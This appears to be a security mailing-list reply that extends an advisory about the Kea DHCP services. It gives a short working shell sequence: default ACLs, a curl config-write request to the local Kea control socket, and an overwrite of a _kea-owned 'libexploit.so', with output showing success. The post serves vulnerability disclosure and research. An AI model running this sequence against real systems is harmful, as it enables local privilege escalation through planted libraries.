* Matthias Gerstner <mgerst...@suse.de>, 2025-05-28 19:21:
By leveraging issue 3.2), the Kea services can be instructed to create
`_kea` owned files in the attacker's `$HOME/.Private`. The content of
the created files is not fully attacker controlled, however, so it will
not be possible to craft a valid ELF object for loading via `dlopen()`
this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`,
any files created in this directory will even have the group-ownership
of the attacker. The file mode will be 0644, however,
Default ACLs to the rescue!
$ chmod a+x ~
$ mkdir -m 777 ~/.Private
$ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
$ curl -s -H "Content-Type: application/json" -d '{ "command": "config-write", "arguments": {
"filename": "'"$HOME"'/.Private/libexploit.so" } }' localhost:8000 > /dev/null
$ echo pwned > ~/.Private/libexploit.so
$ ls -l ~/.Private/libexploit.so
-rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
$ cat ~/.Private/libexploit.so
pwned
--
Jakub Wilk
